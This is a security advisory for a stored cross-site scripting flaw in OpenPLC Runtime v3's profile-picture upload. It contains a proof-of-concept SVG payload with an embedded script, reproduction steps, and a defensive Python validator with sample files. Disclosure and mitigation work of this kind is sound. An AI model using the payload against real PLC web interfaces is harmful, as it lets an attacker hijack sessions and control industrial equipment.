CVE-2024-37741 - Cross-Site Scripting (XSS) on OpenPLC Runtime Version 3
Description
OpenPLC Runtime version 3 (https://github.com/thiagoralves/OpenPLC_v3) contains a cross-site scripting (XSS) vulnerability in the handling of users' profile pictures. An attacker who can edit a user profile can upload a maliciously crafted .svg image file as the picture; when that image is opened, the JavaScript embedded in it executes in the viewer's browser. The vulnerability was assigned CVE-2024-37741.
Reproduction
Save the following payload as image.svg:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS by 1d8");
</script>
</svg>
- Log in > Users > select a user to edit
- Upload image.svg as the user's picture
- Save changes
- Right-click the profile image in the upper-right corner > Open image in new tab
The XSS payload now executes in the browser.
Impact
Because the injected JavaScript runs in the context of the OpenPLC web application, it executes with the victim's session: an attacker can start or stop the PLC, interact with the slave device, or perform any other action the victim is authorised to take in the web interface.
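The root cause is that a profile-picture upload is stored and served without checking that it is actually a raster image. The following server-side check is an added example, not code from OpenPLC: it accepts only PNG/JPEG/GIF by magic bytes, rejects SVG by default, and, where SVG must be allowed, flags the script elements and event-handler attributes that make an SVG executable. Function names and the embedded sample files are constructed for illustration.

```python
import xml.etree.ElementTree as ET  # for untrusted XML prefer defusedxml in production

# Magic bytes of the raster formats a profile picture is expected to be.
RASTER_MAGIC = {b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpeg",
                b"GIF87a": "gif", b"GIF89a": "gif"}

def sniff_raster(data):
    """Return the raster format name if data starts with a known magic, else None."""
    for magic, name in RASTER_MAGIC.items():
        if data.startswith(magic):
            return name
    return None

def svg_active_content(data):
    """List the ways an SVG document could run script when rendered by a browser."""
    reasons = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["not well-formed XML"]
    for elem in root.iter():
        if elem.tag.split("}")[-1].lower() == "script":   # drop the XML namespace
            reasons.append("<script> element")
        for attr in elem.attrib:
            name = attr.split("}")[-1].lower()
            if name.startswith("on"):                     # onload=, onclick=, ...
                reasons.append(f"event handler attribute {name}")
    return reasons

def check_profile_picture(data, allow_svg=False):
    """Return (accepted, reason) for an uploaded profile picture (hypothetical helper)."""
    fmt = sniff_raster(data)
    if fmt:
        return True, f"raster image ({fmt})"
    head = data.lstrip()[:512].lower()
    if head.startswith(b"<?xml") or b"<svg" in head:
        if not allow_svg:
            return False, "SVG is not an accepted profile picture format"
        reasons = svg_active_content(data)
        if reasons:
            return False, "SVG contains active content: " + "; ".join(reasons)
        return True, "SVG without active content"
    return False, "unrecognised image format"

# Constructed samples: the shape of the advisory's payload, a benign SVG and a PNG header.
MALICIOUS_SVG = (b'<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg">'
                 b'<polygon points="0,0 0,50 50,0"/><script>alert(1)</script></svg>')
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>'
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
```

Even an SVG that passes the active-content check should be served with `Content-Disposition: attachment` or under a restrictive Content-Security-Policy, since an allow-list of known dangerous constructs is weaker than refusing the format outright.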